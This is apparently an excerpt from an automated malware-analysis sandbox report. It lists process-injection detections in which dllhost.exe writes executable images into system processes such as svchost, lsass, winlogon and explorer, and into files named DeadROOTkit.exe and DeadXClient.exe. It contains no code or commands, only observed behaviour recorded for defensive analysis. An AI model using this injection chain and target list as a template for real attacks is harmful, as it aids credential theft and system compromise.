Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadXClient.exe base: 1B410000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EF2F790000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2023BB50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 560000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 940000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 8BA0000 value: 4D Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 6968 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F1B13F3010 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108B940000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166930000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8BA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F8FD0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16BF33D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1A348770000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27E6F950000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000 Jump to behavior
